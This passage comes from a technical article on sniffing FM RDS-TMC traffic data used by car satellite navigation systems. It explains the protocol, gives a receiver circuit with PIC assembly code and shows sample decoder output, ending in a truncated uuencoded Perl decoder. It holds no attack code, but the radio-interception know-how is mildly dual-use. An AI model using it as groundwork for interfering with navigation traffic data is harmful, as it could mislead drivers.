+frequencies for the station (that can be tried when the signal is lost),
+descriptive information about the program type, traffic announcements (most
+radio can be set up to interrupt CD and/or tape playing and switch to radio
+when a traffic announcement is detected), time and date and many more
+including TMC messages.
+
+In a FM transmission the RDS signal is transmitted on a 57k subcarrier in
+order to separate the data channel from the Mono and/or Stereo audio.
+
+FM Spectrum:
+
+
+  Mono   Pilot Tone   Stereo (L-R)     RDS Signal
+            
+   ^         ^           ^   ^            ^^
+ ||||||||||  |   ||||||||||  ||||||||||   ||
+ ||||||||||  |   ||||||||||  ||||||||||   ||
+ ||||||||||  |   ||||||||||  ||||||||||   || 
+ ||||||||||  |   ||||||||||  ||||||||||   ||
+ ||||||||||  |   ||||||||||  ||||||||||   ||
+--------------------------------------------------------------------------
+            19k 23k        38k        53k 57k              Freq (Hz)
+
+
+The RDS signal is sampled against a clock frequency of 1.11875 kHz, this
+means that the data rate is 1187.5 bit/s (with a maximum deviation of +/-
+0.125 bit/s).
+
+The wave amplitude is decoded in a binary representation so the actual data
+stream will be friendly '1' and '0'.
+
+The RDS smallest "packet" is called a Block, 4 Blocks represent a Group. Each
+Block has 26 bits of information making a Group 104 bits large.
+
+Group structure (104 bits):
+
+ ---------------------------------------
+| Block 1 | Block 2 | Block 3 | Block 4 |
+ ---------------------------------------
+
+Block structure (26 bits):
+
+ ---------------- ---------------------
+| Data (16 bits) | Checkword (10 bits) |
+ ---------------- ---------------------
+
+The Checkword is a checksum included in every Block computed for error
+protection, the very nature of analog radio transmission introduces many
+errors in data streams. The algorithm used is fully specified in the
+standard and it doesn't concern us for the moment.
+
+Here's a representation of the most basic RDS Group:
+
+Block 1:
+
+ ---------------------              PI code   = 16 bits 
+| PI code | Checkword |             Checkword = 10 bits
+ ---------------------
+
+Block 2:                                               Group code = 4  bits
+                                                       B0         = 1  bit
+ ---------------------------------------------------   TP         = 1  bit 
+| Group code | B0 | TP | PTY | <5 bits> | Checkword |  PTY        = 5  bits
+ ---------------------------------------------------   Checkword  = 10 bits
+
+Block 3:
+
+ ------------------                 Data      = 16 bits
+| Data | Checkword |                Checkword = 10 bits
+ ------------------                
+
+Block 4:
+
+ ------------------                 Data      = 16 bits
+| Data | Checkword |                Checkword = 10 bits
+ ------------------                  
+
+
+The PI code is the Programme Identification code, it identifies the radio
+station that's transmitting the message. Every broadcaster has a unique
+assigned code.
+
+The Group code identifies the type of message being transmitted as RDS can
+be used for transmitting several different message formats. Type 0A (00000)
+and 0B (00001) for instance are used for tuning information. RDS-TMC
+messages are transmitted in 8A (10000) groups. Depending on the Group type
+the remaining 5 bits of Block 2 and the Data part of Block 3 and Block 4
+are used according to the relevant Group specification.
+
+The 'B0' bit is the version code, '0' stands for RDS version A, '1' stands
+for RDS version B.
+
+The TP bit stands for Traffic Programme and identifies if the station is
+capable of sending traffic announcements (in combination with the TA code
+present in 0A, 0B, 14B, 15B type messages), it has nothing to do with
+RDS-TMC and it refers to audio traffic announcements only.
+
+The PTY code is used for describing the Programme Type, for instance code 1
+(converted in decimal from its binary representation) is 'News' while code
+4 is 'Sport'.
+
+
+--[ 4. RDS-TMC
+
+Traffic Message Channel packets carry information about traffic events,
+their location and the duration of the event. A number of lookup tables are
+being used to correlate event codes to their description and location
+codes to the GPS coordinates, those tables are expected to be present in
+our SatNav memory. The RDS-TMC standard is described in International
+Standard (ISO) 14819-1.
+
+All the most recent SatNav systems supports RDS-TMC to some degree, some
+systems requires purchase of an external antenna in order to correctly receive
+the signal, modern ones integrated in the car cockpit uses the existing FM
+antenna used by the radio system. The interface of the SatNav allows
+display of the list of received messages and prompts detours upon events
+that affect the current route.
+
+TMC packets are transmitted as type 8A (10000) Groups and they can be
+divided in two categories: Single Group messages and Multi Group messages.
+Single Group messages have bit number 13 of Block 2 set to '1', Multi Group
+messages have bit number 13 of Block 2 set to '0'.
+
+Here's a Single Group RDS-TMC message:
+
+Block 1:
+
+ ---------------------              PI code   = 16 bits 
+| PI code | Checkword |             Checkword = 10 bits
+ ---------------------
+
+Block 2:                                                Group code = 4  bits
+                                                        B0         = 1  bit
+ -----------------------------------------------------  TP         = 1  bit 
+| Group code | B0 | TP | PTY | T | F | DP | Checkword | PTY        = 5  bits
+ -----------------------------------------------------  Checkword  = 10 bits
+
+ T = 1 bit    DP = 3 bits  
+ F = 1 bit    
+
+Block 3:                                                D          = 1 bit 
+                                                        PN         = 1 bit
+ -------------------------------------                  Extent     = 3 bits
+| D | PN | Extent | Event | Checkword |                 Event      = 11 bits
+ -------------------------------------                  Checkword  = 10 bits
+
+Block 4:
+
+ ----------------------             Location  = 16 bits
+| Location | Checkword |            Checkword = 10 bits
+ ----------------------                  
+
+
+We can see the usual data which we already discussed for RDS as well as new
+information (the <5 bits> are now described).
+
+We already mentioned the 'F' bit, it's bit number 13 of Block 2 and it
+identifies the message as a Single Group (F = 1) or Multi Group (F = 0). 
+
+The 'T', 'F' and 'D' bits are used in Multi Group messages for identifying if
+this is the first group (TFD = 001) or a subsequent group (TFD = 000) in the
+stream.
+
+The 'DP' bit stands for duration and persistence, it contains information
+about the timeframe of the traffic event so that the client can
+automatically flush old ones.
+
+The 'D' bit tells the SatNav if diversion advice needs to be prompted or
+not.
+
+The 'PN' bit (Positive/Negative) indicates the direction of queue events,
+it's opposite to the road direction since it represent the direction of the
+growth of a queue (or any directional event).
+
+The 'Extent' data shows the extension of the current event, it is measured
+in terms of nearby Location Table entries.
+
+The 'Event' part contains the 11 bit Event code, which is looked up on the
+local Event Code table stored on the SatNav memory. The 'Location' part
+contains the 16 bit Location code which is looked up against the Location
+Table database, also stored on your SatNav memory, some countries allow a
+free download of the Location Table database (like Italy[1]).
+
+Multi Group messages are a sequence of two or more 8A groups and can
+contain additional information such as speed limit advices and
+supplementary information.
+
+
+--[ 5. Sniffing circuitry
+
+Sniffing RDS traffic basically requires three components:
+
+1. FM radio with MPX output
+2. RDS signal demodulator
+3. RDS protocol decoder
+
+The first element is a FM radio receiver capable of giving us a signal that
+has not already been demodulated in its different components since we need
+access to the RDS subcarrier (and an audio only output would do no good).
+This kind of "raw" signal is called MPX (Multiplex). The easiest way to get
+such signal is to buy a standard PCI Video card that carries a tuner
+which has a MPX pin that we can hook to.
+
+One of these tuners is Philips FM1216[2] (available in different
+"flavours", they all do the trick) which provides pin 25 for this purpose.
+It's relatively easy to identify a PCI Video card that uses this tuner, we
+used the WinFast DV2000. An extensive database[3] is available.
+
+Once we get the MPX signal it can then be connect to a RDS signal
+demodulator which will perform the de-modulation and gives us parsable
+data. Our choice is ST Microelectronics TDA7330B[4], a commercially
+available chip used in most radio capable of RDS de-modulation. Another
+possibility could be the Philips SAA6579[5], it offers the same
+functionality of the TDA7330, pinning might differ.
+
+Finally we use custom PIC (Peripheral Interface Controller) for preparing
+and sending the information generated by the TDA7330 to something that we
+can understand and use, like a standard serial port.  
+
+The PIC brings DATA, QUAL and CLOCK from demodulator and "creates" a
+stream good enough to be sent to the serial port. Our PIC uses only two
+pins of the serial port (RX - RTS), it prints out ascii '0' and '1'
+clocked at 19200 baud rate with one start bit and two stop bits, no parity
+bit is used. 
+
+As you can see the PIC makes our life easier, in order to see the raw
+stream we only have to connect the circuit and attach a terminal to the
+serial port, no particular driver is needed. The PIC we use is a PIC 16F84,
+this microcontroller is cheap and easy to work with (its assembly has only
+35 instructions), furthermore a programmer for setting up the chip can be
+easily bought or assembled. If you want to build your own programmer a good
+choice would be uJDM[6], it's one of the simplest PIC programmers available
+(it is a variation of the famous JDM programmer).
+
+At last we need to convert signals from the PIC to RS232 compatible signal
+levels. This is needed because the PIC and other integrated circuits works
+under TTL (Transistor to Transistor Logic - 0V/+5V), whereas serial port
+signal levels are -12V/+12V. The easiest approach for converting the signal
+is using a Maxim RS-232[7]. It is a specialized driver and receiver
+integrated circuit used to convert between TTL logic levels and RS-232
+compatible signal levels.
+
+Here's the diagram of the setup:
+
+                \   /
+                 \ / 
+                  |
+                  |
+                  |                     [ RDS - Demodulator ]
+                  |                           *diagram*
+   ______________[ ]__
+  |-        ||        |=-                         
+  |-        ||  F T   |=-
+  |-        ||  M U   |=-
+P |-        ||  1 N   |=- 
+C |-        ||  2 E   |=-                 
+I |-        ||  1 R   |=-                  
+  |-        ||  6     |=-                           1  _______  20
+B |         ||________|=- --------> MPX  --->  MUXIN -|.  U   |-
+u |-                  | pin 25                       -|       |-
+s |-                  | AF sound output              -|   T   |-
+  |-                  |                              -|   D   |-
+  |-                  |                              -|   A   |-
+  |-                  |                              -|   7   |-
+  |-                  |                              -|   3   |- QUAL______
+  |-                  |                              -|   3   |- DATA____  |
+  |-                  |                              -|   0   |- CLOCK_  | |
+  |___________________|                              -|_______|-       | | V
+                                                   10          11      | V |
+        _______________________________________________________________V | |
+       |      ___________________________________________________________| |
+       |  ___|_____________________________________________________________|
+       | |   |
+       | |   |           1  _______  18
+       V |   V          x -|.  u   |- -> data out (to rs232)______________
+       | V   |          x -|       |- -> rts  out (to rs232)____________  |
+       | |  _|          x -|   1   |- <- osc1 / clkin                   | |
+       | | |      MCLR -> -|   6   |- -> OSC2 / CLKOUT                  | V
+       | | | Vss (gnd) -> -|   F   |- <- Vdd (+5V)                      V |
+       | | |_____ DATA -> -|   8   |- x                                 | |
+       | |_______ QUAL -> -|   4   |- x                                 | |
+       |________ CLOCK -> -|       |- x                                 | |
+                        x -|_______|- x                                 | |
+                         9           10                                 | |
+                                       ______________________________   | |
+    Serial Port                       |            1  _______  16    |  | |
+   (DB9 connector)                    |             -|.  U   |-      ^  | | 
+              ______________          |             -|       |-      |  | |
+             | RX - pin2    |         |             -|   R   |- RTS _|  | |
+         ____V________      |         |             -|   S   |-         V |
+        |  . o . . .  |     |         |             -|   2   |-         | V 
+         \  . o . .  /      |         |             -|   3   |- <- _____| |
+           ---------        |_________|____ <- DATA -|   2   |- <- _______|
+              ^ RTS - pin 7           |             -|_______|-         
+              |_______________________|            8           9       
+               
+
+Here's the commented assembler code for our PIC:
+
+; 
+; Copyright 2007 Andrea Barisani <lcars@inversepath.com>
+;                Daniele Bianco <danbia@inversepath.com>
+;
+; Permission to use, copy, modify, and distribute this software for any
+; purpose with or without fee is hereby granted, provided that the above
+; copyright notice and this permission notice appear in all copies.
+;
+; THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+; WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+; MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+; ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+; WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+; ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+; OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+;
+; Pin diagram:   
+;
+;                   1  _______  18
+;                  x -|.  U   |- -> DATA out (to RS232)
+;                  x -|       |- -> RTS  out (to RS232)
+;                  x -|   1   |- <- OSC1 / CLKIN 
+;            MCLR -> -|   6   |- -> OSC2 / CLKOUT
+;       Vss (gnd) -> -|   F   |- <- Vdd (+5V)
+;            DATA -> -|   8   |- x   
+;            QUAL -> -|   4   |- x
+;           CLOCK -> -|       |- x
+;                  x -|_______|- x
+;                   9           10 
+;
+; Connection description:
+; 
+; pin 4 : MCLR          (it must be connected to Vdd through a resistor
+;                        to prevent PIC reset - 10K is a good resistor)
+; pin 5 : Vss           (directly connected to gnd)
+;
+; pin 6 : DATA  input   (directly connected to RDS demodulator DATA  out)
+; pin 7 : QUAL  input   (directly connected to RDS demodulator QUAL  out)
+; pin 8 : CLOCK input   (directly connected to RDS demodulator CLOCK out)
+;
+; pin 14: Vdd           (directly connected to +5V)
+; pin 15: OSC2 / CLKOUT (connected to an 2.4576 MHz oscillator crystal* )
+; pin 16: OSC1 / CLKIN  (connected to an 2.4576 MHz oscillator crystal* )
+; 
+; pin 17: RTS  output   (RS232 - ''RTS'' pin 7 on DB9 connector** )
+; pin 18: DATA output   (RS232 - ''RX''  pin 2 on DB9 connector** )
+; 
+; pin 1,2,3,9,10,11,12,13: unused
+; 
+; *)
+; We can connect the oscillator crystal to the PIC using this simple 
+; circuit:
+;               
+;                C1 (15-33 pF)
+;              ____||____ ______ OSC1 / CLKIN  
+;             |    ||    |     
+;             |         ___
+;      gnd ---|          =  XTAL (2.4576 MHz)
+;             |         ---
+;             |____||____|______ 
+;                  ||            OSC2 / CLKOUT
+;                C2 (15-33 pF)
+; **) 
+; We have to convert signals TTL <-> RS232 before we send/receive them 
+; to/from the serial port. 
+; Serial terminal configuration:
+; 8-N-2 (8 data bits - No parity - 2 stop bits)
+;
+
+; HARDWARE CONF -----------------------
+    PROCESSOR    16f84
+    RADIX        DEC
+    INCLUDE      "p16f84.inc"
+
+    ERRORLEVEL   -302                  ; suppress warnings for bank1
+
+    __CONFIG 1111111110001b            ; Code Protection  disabled
+                                       ; Power Up Timer    enabled
+                                       ; WatchDog Timer   disabled
+                                       ; Oscillator type        XT
+; -------------------------------------
+
+; DEFINE ------------------------------
+#define    Bank0     bcf  STATUS, RP0  ; activates bank 0
+#define    Bank1     bsf  STATUS, RP0  ; activates bank 1
+
+#define    Send_0    bcf     PORTA, 1  ; send 0 to RS232 RX
+#define    Send_1    bsf     PORTA, 1  ; send 1 to RS232 RX
+#define    Skip_if_C btfss  STATUS, C  ; skip if C FLAG is set
+
+#define    RTS               PORTA, 0  ; RTS   pin RA0
+#define    RX                PORTA, 1  ; RX    pin RA1
+#define    DATA              PORTB, 0  ; DATA  pin RB0
+#define    QUAL              PORTB, 1  ; QUAL  pin RB1
+#define    CLOCK             PORTB, 2  ; CLOCK pin RB2
+
+RS232_data     equ               0x0C  ; char to transmit to RS232
+BIT_counter    equ               0x0D  ; n. of bits to transmit to RS232
+RAW_data       equ               0x0E  ; RAW data (from RDS demodulator)
+dummy_counter  equ               0x0F  ; dummy counter... used for delays
+; -------------------------------------
+
+; BEGIN PROGRAM CODE ------------------
+
+    ORG    000h
+    
+InitPort
+
+    Bank1                              ; select bank 1
+    
+    movlw  00000000b                   ; RA0-RA4 output
+    movwf  TRISA                       ;
+    
+    movlw  00000111b                   ; RB0-RB2 input / RB3-RB7 output
+    movwf  TRISB                       ;
+    
+    Bank0                              ; select bank 0
+    
+    movlw  00000010b                   ; set voltage at -12V to RS232 ''RX''
+    movwf  PORTA                       ;
+    
+Main
+
+    btfsc  CLOCK                       ; wait for clock edge (high -> low)
+    goto   Main                        ;
+
+    movfw  PORTB                       ; 
+    andlw  00000011b                   ; reads levels on PORTB and send
+    movwf  RAW_data                    ; data to RS232
+    call   RS232_Tx                    ; 
+
+    btfss  CLOCK                       ; wait for clock edge (low -> high)
+    goto   $-1                         ;               
+    
+    goto   Main
+
+RS232_Tx                               ; RS232 (19200 baud rate) 8-N-2
+                                       ; 1 start+8 data+2 stop - No parity  
+    btfsc  RAW_data,1
+    goto   Good_qual
+    goto   Bad_qual
+   
+Good_qual                              ; 
+    movlw  00000001b                   ;
+    andwf  RAW_data,w                  ; good quality signal 
+    iorlw  '0'                         ; sends '0' or '1' to RS232
+    movwf  RS232_data                  ; 
+    goto   Char_Tx
+
+Bad_qual                               ;
+    movlw  00000001b                   ;
+    andwf  RAW_data,w                  ; bad  quality signal     
+    iorlw  '*'                         ; sends '*' or '+' to RS232
+    movwf  RS232_data                  ;
+
+Char_Tx
+    
+    movlw  9                           ; (8 bits to transmit)
+    movwf  BIT_counter                 ; BIT_counter = n. bits + 1
+
+    call   StartBit                    ; sends start bit
+
+Send_loop
+    
+    decfsz BIT_counter, f              ; sends all data bits contained in
+    goto   Send_data_bit               ; RS232_data
+
+    call   StopBit                     ; sends 2 stop bit and returns to Main
+
+    Send_1
+    goto   Delay16
+    
+StartBit
+   
+    Send_0
+    nop
+    nop
+    goto   Delay16
+
+StopBit
+
+    nop
+    nop
+    nop
+    nop
+    nop
+    
+    Send_1
+    call   Delay8
+    goto   Delay16
+
+Send_0_
+    Send_0
+    goto   Delay16
+
+Send_1_
+    nop
+    Send_1
+    goto   Delay16
+
+Send_data_bit
+    rrf    RS232_data, f               ; result of rotation is saved in
+    Skip_if_C                          ; C FLAG, so skip if FLAG is set
+    goto   Send_zero
+    call   Send_1_
+    goto   Send_loop
+    
+Send_zero
+    call   Send_0_
+    goto   Send_loop
+;
+; 4 / clock = ''normal'' instruction period (1 machine cycle )
+; 8 / clock = ''branch'' instruction period (2 machine cycles)
+;
+;     clock            normal instr.           branch instr. 
+;   2.4576 MHz           1.6276 us               3.2552 us
+;
+Delay16
+
+    movlw  2                           ; dummy cycle,
+    movwf  dummy_counter               ; used only to get correct delay
+                                       ; for timing.
+    decfsz dummy_counter,f             ; 
+    goto  $-1                          ; Total delay: 8 machine cycles
+    nop                                ; ( 1 + 1 + 1 + 2 + 2 + 1 = 8 )
+ 
+Delay8
+
+    movlw  2                           ; dummy cycle,
+    movwf  dummy_counter               ; used only to get correct delay
+                                       ; for timing.
+    decfsz dummy_counter,f             ; 
+    goto   $-1                         ; Total delay: 7 machine cycles
+                                       ; ( 1 + 1 + 1 + 2 + 2 = 7 )
+Delay1
+
+    nop
+    
+    RETURN                             ; unique return point
+
+END
+
+; END PROGRAM CODE --------------------
+
+</code>
+
+
+Using the circuit we assembled we can "sniff" RDS traffic directly on the
+serial port using screen, minicom or whatever terminal app you like.
+You should configure your terminal before attaching it to the serial port,
+the settings are 19200 baud rate, 8 data bits, 2 stop bits, no parity.
+
+# stty -F /dev/ttyS0 19200 cs8 cstopb -parenb
+speed 19200 baud; rows 0; columns 0; line = 0; intr = ^C; quit = ^\; 
+erase = ^?; kill = ^H; eof = ^D; eol = <undef>; eol2 = <undef>;
+swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
+werase = ^W; lnext = ^V; flush = ^O; min = 100; time = 2; -parenb -parodd 
+cs8 -hupcl cstopb cread clocal crtscts -ignbrk brkint ignpar -parmrk -inpck
+-istrip -inlcr -igncr -icrnl -ixon -ixoff -iuclc -ixany -imaxbel -iutf8
+-opost -olcuc -ocrnl -onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 
+vt0 ff0 -isig -icanon iexten -echo echoe echok -echonl -noflsh -xcase 
+-tostop -echoprt echoctl echoke
+
+# screen /dev/ttyS0 19200
+1010100100001100000000101000*000101001+11101111011111111110000001011011100
+10101001++000001100101100*110100101001000011000000111010000100101001111111
+0011101100010011000100000+000000000 ... <and so on>
+
+As you can see we get '0' and '1' as well as '*' and '+', this is because
+the circuit estimates the quality of the signal. '*' and '+' are bad
+quality '0' and '1' data. We ignore bad data and only accept good quality.
+Bad quality data should be ignored, and if you see a relevant amount of '*'
+and '+' in your stream verify the tuner settings.  
+
+In order to identify the beginning of an RDS message and find the right
+offset we "lock" against the PI code, which is present at the beginning of
+every RDS group. PI codes for every FM radio station are publicly available
+on the Internet, if you know the frequency you are listening to then you
+can figure out the PI code and look for it. If you have no clue about what
+the PI code might be a way for finding it out is seeking the most recurring
+16 bit string, which is likely to be the PI code.
+
+Here's a single raw RDS Group with PI 5401 (hexadecimal conversion of
+101010000000001):
+
+01010100000000011111011001000001000010100011001011000000001000010100000011001001010010010000010001101110
+
+Let's separate the different sections:
+
+0101010000000001 1111011001 0000  01 0  0001 01000    1100101100 0000001000010100 0000110010 0101001001000001 0001101110
+PI code          Checkword  Group B0 TP PTY  <5 bits> Checkword  Data             Checkword  Data             Checkword
+
+So we can isolate and identify RDS messages, now you can either parse them
+visually by reading the specs (not a very scalable way we might say) or use
+a tool like our Simple RDS Decoder.
+
+
+--[ 10. Simple RDS Decoder 0.1
+
+The tool parses basic RDS messages and 0A Group (more Group decoding will
+be implemented in future versions) and performs full decoding of Single
+group RDS-TMC messages (Multi Group support is also planned for future
+releases).
+
+Here's the basic usage:
+
+# ./srdsd -h
+
+Simple RDS-TMC Decoder 0.1     || http://dev.inversepath.com/rds
+Copyright 2007 Andrea Barisani || <andrea@inversepath.com>
+Usage: ./srdsd.pl [-h|-H|-P|-t] [-d <location db path>] [-p <PI number>] <input file>
+   -t display only tmc packets
+   -H HTML output (outputs to /tmp/rds-*.html)
+   -p PI number
+   -P PI search
+   -d location db path
+   -h this help
+
+Note: -d option expects a DAT Location Table code according to TMCF-LT-EF-MFF-v06 
+      standard (2005/05/11)
+
+As we mentioned the first step is finding the PI for your RDS stream, if you
+don't know it already you can use '-P' option:
+
+# ./srdsd -P rds_dump.raw | tail
+
+0010000110000000: 4140 (2180)
+1000011000000001: 4146 (8601)
+0001100000000101: 4158 (1805)
+1001000011000000: 4160 (90c0)
+0000110000000010: 4163 (0c02)
+0110000000010100: 4163 (6014)
+0011000000001010: 4164 (300a)
+0100100001100000: 4167 (4860)
+1010010000110000: 4172 (a430)
+0101001000011000: 4185 (5218)
+
+Here 5218 looks like a reasonable candidate being the most recurrent
+string. Let's try it:
+
+# ./srdsd -p 5218 -d ~/loc_db/ rds_dump.raw
+
+Reading TMC Location Table at ~/loc_db/:
+	 parsing NAMES: 13135 entries
+	 parsing ROADS: 1011 entries
+	 parsing SEGMENTS: 15 entries
+	 parsing POINTS: 12501 entries
+done.
+
+Got RDS message (frame 1)
+	Programme Identification: 0101001000011000 (5218)
+	Group type code/version: 0000/0 (0A  - Tuning)
+	Traffic Program: 1
+	Programme Type: 01001 (9  - Varied Speech)
+	Block 2: 01110
+	Block 3: 1111100000010110
+	Block 4: 0011000000110010
+	Decoded 0A group:
+		Traffic Announcement: 0
+		Music Speech switch: 0
+		Decoder Identification control: 110 (Artificial Head / PS char 5,6)
+		Alternative Frequencies: 11111000, 00010110 (112.3, 89.7)
+		Programme Service name: 0011000000110010 (02)
+		Collected PSN: 02
+
+...
+
+Got RDS message (frame 76)
+	Programme Identification: 0101001000011000 (5218)
+	Group type code/version: 1000/0 (8A  - TMC)
+	Traffic Program: 1
+	Programme Type: 01001 (9  - Varied Speech)
+	Block 2: 01000
+	Block 3: 0101100001110011
+	Block 4: 0000110000001100
+	Decoded 8A group:
+		Bit X4: 0 (User message)
+		Bit X3: 1 (Single-group message)
+		Duration and Persistence: 000 (no explicit duration given)
+		Diversion advice: 0
+		Direction: 1 (-)
+		Extent: 011 (3)
+		Event: 00001110011 (115 - slow traffic (with average speeds Q))
+		Location: 0000110000001100 (3084)
+		Decoded Location:
+			Location code type: POINT
+			Name ID: 11013 (Sv. Grande Raccordo Anulare)
+			Road code: 266 (Roma-Ss16)
+			GPS: 41.98449 N 12.49321 E
+			Link: http://maps.google.com/maps?ll=41.98449,12.49321&spn=0.3,0.3&q=41.98449,12.49321
+
+
+...and so on.
+
+The 'Collected PSN' variable holds all the character of Programme Service
+name seen so far, this way we can track (just like RDS FM Radio do) the
+name of the station:
+
+# ./srdsd -p 5201 rds_dump.raw | grep "Collected PSN" | head
+
+		Collected PSN: DI
+		Collected PSN: DIO1
+		Collected PSN: DIO1  
+		Collected PSN: RADIO1  
+		Collected PSN: RADIO1  
+
+
+Check out '-H' switch for html'ized output in /tmp (which can be useful for
+directly following the Google Map links). We also have a version that plots
+all the traffic on Google Map using their API, if you are interested in it
+just email us.
+
+Have fun.
+
+
+--[ I. References
+
+
+[1] - Italian RDS-TMC Location Table Database
+      https://www2.ilportaledellautomobilista.it/info/infofree?idUser=1&idBody=14
+
+[2] - Philips FM1216 DataSheet
+      http://pvr.sourceforge.net/FM1216.pdf
+
+[3] - PVR Hardware Database
+      http://pvrhw.goldfish.org
+
+[4] - SGS-Thompson Microelectronics TDA7330
+      http://www.datasheetcatalog.com/datasheets_pdf/T/D/A/7/TDA7330.shtml
+
+[5] - Philips SAA6579
+      http://www.datasheetcatalog.com/datasheets_pdf/S/A/A/6/SAA6579.shtml
+
+[6] - uJDM PIC Programmer
+      http://www.semis.demon.co.uk/uJDM/uJDMmain.htm
+
+[7] - Maxim RS-232
+      http://www.maxim-ic.com/getds.cfm?qv_pk=1798&ln=en
+
+[8] - Xcircuit
+      http://xcircuit.ece.jhu.edu 
+
+
+--[ II. Code
+
+Code also available at http://dev.inversepath.com/rds/
+
+<++> Simple RDS Decoder 0.1 - srdsd.uue
+
+begin 644 srdsd
+M(R$O=7-R+V)I;B]P97)L"B,*(R!3:6UP;&4@4D13+51-0R!$96-O9&5R(#`N
+M,0HC"B,@5&AI<R!#;V1E(&ES($,N4BY5+D0N12X*(R`H0V]D92!2=7-H960@
+M86YD(%5G;'D@8F5C875S92!O9B!5;F5X<&5C=&5D($1%861L:6YE*0HC(`HC
+M($-O<'ER:6=H="`R,#`W($%N9')E82!"87)I<V%N:2`\86YD<F5A0&EN=F5R
+M<V5P871H+F-O;3X*(PHC(%!E<FUI<W-I;VX@=&\@=7-E+"!C;W!Y+"!M;V1I
+M9GDL(&%N9"!D:7-T<FEB=71E('1H:7,@<V]F='=A<F4@9F]R(&%N>0HC('!U
+M<G!O<V4@=VET:"!O<B!W:71H;W5T(&9E92!I<R!H97)E8GD@9W)A;G1E9"P@
+M<')O=FED960@=&AA="!T:&4@86)O=F4*(R!C;W!Y<FEG:'0@;F]T:6-E(&%N
+M9"!T:&ES('!E<FUI<W-I;VX@;F]T:6-E(&%P<&5A<B!I;B!A;&P@8V]P:65S
+M+@HC"B,@5$A%(%-/1E1705)%($E3(%!23U9)1$5$(")!4R!)4R(@04Y$(%1(
+M12!!551(3U(@1$E30TQ!24U3($%,3"!705)204Y42453"B,@5TE42"!214=!
+M4D0@5$\@5$A)4R!33T945T%212!)3D-,541)3D<@04Q,($E-4$Q)140@5T%2
+M4D%.5$E%4R!/1@HC($U%4D-(04Y404))3$E462!!3D0@1DE43D534RX@24X@
+M3D\@159%3E0@4TA!3$P@5$A%($%55$A/4B!"12!,24%"3$4@1D]2"B,@04Y9
+M(%-014-)04PL($1)4D5#5"P@24Y$25)%0U0L($]2($-/3E-%455%3E1)04P@
+M1$%-04=%4R!/4B!!3ED@1$%-04=%4PHC(%=(05133T5615(@4D5354Q424Y'
+M($923TT@3$]34R!/1B!54T4L($1!5$$@3U(@4%)/1DE44RP@5TA%5$A%4B!)
+M3B!!3@HC($%#5$E/3B!/1B!#3TY44D%#5"P@3D5'3$E'14Y#12!/4B!/5$A%
+M4B!43U)424]54R!!0U1)3TXL($%225-)3D<@3U54($]&"B,@3U(@24X@0T].
+M3D5#5$E/3B!7251((%1(12!54T4@3U(@4$521D]234%.0T4@3T8@5$A)4R!3
+M3T945T%212X*"G5S92!S=')I8W0["G5S92!W87)N:6YG<SL*=7-E($9I;&4Z
+M.E1E;7`@<7<H=&5M<&1I<BD["G5S92!'971O<'0Z.DQO;F<@<7<H.F-O;F9I
+M9R!N;U]I9VYO<F5?8V%S92D["@IM>2`E;W!T<SL@"D=E=$]P=&EO;G,H)W1M
+M8R<@/3X@7"1O<'1S>R=T)WTL("=(=&UL)R`]/B!<)&]P='-[)T@G?2P@)U!)
+M<V5A<F-H)R`]/B!<)&]P='-[)U`G?2P*("`@("`@("`@("`G<&D]:2<]/B!<
+M)&]P='-[)W`G?2P@)V1B/7,G(#T^(%PD;W!T<WLG9"=]+"`G:&5L<"<@/3X@
+M7"1O<'1S>R=H)WTI.PII9B`H)&]P='-[)V@G?2!O<B`H(21!4D=66S!=*2D@
+M>R!U<V%G92@I.R!]"@IO<&5N*$9)3$4L("(\)$%21U9;,%TB*2!O<@H@("`@
+M9&EE(")#;W5L9"!N;W0@;W!E;B`D05)'5ELP73H@)"%<;B(["@II9B`H)&]P
+M='-[)U`G?2D@>R!P:7-E87)C:"@I.R!E>&ET(#`[('T*"FUY($!04TX@/2`H
+M*3L*;7D@*"1I+"`D:6YD97@I(#T@,#L*;7D@*$!$4"P@0%!.+"!`179E;G0I
+M.PIM>2`H)&9I;F1022P@)$9(+"`D<F1S7VUS9RP@)'1A8FQE7W!A=&@I.PIM
+M>2`H)7!O:6YT+"`E;F%M92P@)7)O860L("5S96=M96YT+"`E8VAA<BP@)61I
+M+"`E<'1Y+"`E9W)P*3L*"FUY("1022`@/2!H97@R8FEN*"1O<'1S>R=P)WTI
+M('Q\("(P,3`Q,#`Q,#`P,#`P,#`Q(CL@(R!2861I;S$*;7D@)&1I<B`]("(O
+M=&UP+W)D<RU86%A86%@B.PH*:6YI=%]L;V]K=7!?=&%B;&5S*"D["@II9B`H
+M)&]P='-[)V0G?2D@>PH@("`@)'1A8FQE7W!A=&@@/2`D;W!T<WLG9"=].PH@
+M("`@<F5A9%]T;6-?=&%B;&4H)'1A8FQE7W!A=&@I.PI]"@II9B`H)&]P='-[
+M)T@G?2D@>PH@("`@)&1I<B`]('1E;7!D:7(H)&1I<BD["B`@("!O<&5N*$E.
+M1$58+"`B/B1D:7(O:6YD97@M<F1S+FAT;6PB*3L*("`@('!R:6YT($E.1$58
+M("(\:'1M;#X\8F]D>3X\<')E/B(["GT*"G=H:6QE*"%E;V8H1DE,12DI('L*
+M("`@(')E860H1DE,12PD9FEN9%!)+#$V+#`I.PH*("`@(&EF("@D9FEN9%!)
+M(#T]("1022D@>PH@("`@("`@("1I;F1E>"LK.PH@("`@("`@(')E860H1DE,
+M12PD<F1S7VUS9RPH,3`T+3$V*2PP*3L*("`@("`@("!P87)S95]R9',H)')D
+M<U]M<V<I.PH@("`@?0H@("`@<V5E:RA&24Q%+"1I+#`I.R`D:2LK.PI]"@II
+M9B`H)&]P='-[)T@G?2D@>PH@("`@<')I;G0@24Y$15@@(CPO<')E/CPO8F]D
+M>3X\+VAT;6P^(CL*("`@(&-L;W-E($E.1$58.PI]"@IS=6(@<&%R<V5?<F1S
